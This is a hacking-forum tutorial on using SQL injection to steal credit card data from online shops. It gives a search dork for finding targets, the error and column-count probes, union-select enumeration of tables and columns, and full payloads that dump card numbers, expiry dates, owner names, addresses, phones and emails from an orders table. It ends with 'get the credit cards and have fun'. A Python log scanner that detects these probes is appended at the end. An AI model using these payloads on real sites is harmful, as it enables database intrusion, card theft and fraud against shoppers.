(CC Hacking) New SQL Injection Tutorials 2016

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). This is a new tutorial by me for hacking CC.

1) We have to search Google for webshops. I used this dork:

Code:
inurl:customer_testimonials.php testimonial_id=


2) Let's say we got this site:

Code:
http://www.JustExample.com/customer_...stimonial_id=7


3) We have to check if it's vulnerable to SQLi. We add this

Code:
'

to the URL:

>>>

Code:
http://www.JustExample.com/customer_...stimonial_id=7'

If we get an error, it means the website is vulnerable.

4) We have to check the column number. We try with 10 first:

Code:
+order+by+10--

>>>

Code:
http://www.JustExample.com/customer_...+order+by+10--

If we don't get an error, the website has at least 10 columns; if we get an error, the website has fewer than 10 columns.

5) This time we get an error, so now we try from 1 to 9:

Code:
+union+select+1,2,3,4,5,6,7,8,9--

>>>

Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--

Now we found it: the website has 9 columns.

6) Most of the time we can get info from column 3 and 6; let's say now we can from 3 xD. Now we can get the database user, database name and database version this way:

*- database user

Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--

*- database name

Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--

*- database version

Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


7) We need the table names. We add this to the URL:

Code:
+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables--

>>>

Code:
http://www.JustExample.com/customer_...chema.tables--


8) Now we need the columns. We add this to the URL:

Code:
+union+select+1,2,concat(table_name,char(58),column_name),4,5,6,7,8,9+from+information_schema.columns--

>>>

Code:
http://www.JustExample.com/customer_...hema.columns--

9) Now all we have to do is view the orders and customer info (that's where the credit cards are xD). If we add this to the URL we will get credit card numbers, payment method, credit card type......


Code:
+union+select+1,2,concat(payment_method,char(58),cc_type,char(58),cc_number,char(58),cc_expires),4,5,6,7,8,9+from+orders--

>>>

Code:
http://www.JustExample.com/customer_...+from+orders--

If we add this to the URL we will get lots of info about the customers: address, phone number, e-mails, zip code, and all of the credit card info.


Code:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_street_address,0x2F,customers_suburb,0x2F,customers_city,0x2F,customers_postcode,0x2F,customers_state,0x2F,customers_country,0x2F,customers_telephone,0x2F,customers_email_address,0x2F,date_purchased),4,5,6,7,8,9+from+orders+

>>>

Code:
/customer_testimonials.php?&testimonial_id=7+union+select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_street_address,0x2F,customers_suburb,0x2F,customers_city,0x2F,customers_postcode,0x2F,customers_state,0x2F,customers_country,0x2F,customers_telephone,0x2F,customers_email_address,0x2F,date_purchased),4,5,6,7,8,9+from+orders+


Now one step left:

10) Get the credit cards and have fun....

Don't forget to use your brain......

ENJOY !!!!
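The probe sequence in steps 3 to 8 leaves a clear trail in web-server logs, which is what a defender monitors for. The Python below is an added example, not part of the original post: it scans constructed Apache-style access-log lines (sample data, not real traffic) for the quote test, the ORDER BY column-count probe, UNION SELECT and the information_schema lookup, and groups the stages seen per client address; the log format, the stage names and the sample lines are my assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (sample data, not real traffic) that replay
# the tutorial's probes against the testimonial_id parameter; one client escalates.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2016:12:00:01 +0000] "GET /customer_testimonials.php?testimonial_id=7 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Mar/2016:12:00:03 +0000] "GET /customer_testimonials.php?testimonial_id=7' HTTP/1.1" 500 312
203.0.113.5 - - [10/Mar/2016:12:00:07 +0000] "GET /customer_testimonials.php?testimonial_id=7+order+by+10-- HTTP/1.1" 500 312
203.0.113.5 - - [10/Mar/2016:12:00:12 +0000] "GET /customer_testimonials.php?testimonial_id=7+union+select+1,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 5190
203.0.113.5 - - [10/Mar/2016:12:00:20 +0000] "GET /customer_testimonials.php?testimonial_id=7+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables-- HTTP/1.1" 200 6200
198.51.100.9 - - [10/Mar/2016:12:01:00 +0000] "GET /customer_testimonials.php?testimonial_id=12 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Stage names are my own labels; each pattern runs over the decoded parameter value.
RULES = [
    ("quote_probe", re.compile(r"^\d+'\s*$")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
]

def classify(value):
    """Return the stage names whose pattern appears in one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]

def scan_log(text):
    """Return (ip, status, param, stages) for each request whose id parameter is not a plain integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs decodes '+' and %xx, so 'order+by' is matched as 'order by'
        for param, values in parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True).items():
            for value in values:
                if value.isdigit():
                    continue  # a well-formed numeric id needs no further look
                stages = classify(value)
                if stages:
                    findings.append((m.group("ip"), int(m.group("status")), param, stages))
    return findings

def stages_by_source(findings):
    """Group stages per client IP in first-seen order; several stages from one IP is the enumeration chain."""
    chain = {}
    for ip, _status, _param, stages in findings:
        seen = chain.setdefault(ip, [])
        for s in stages:
            if s not in seen: seen.append(s)
    return chain
```

A plain integer id never triggers a stage, so the alert condition worth paging on is one source reaching two or more stages against the same parameter.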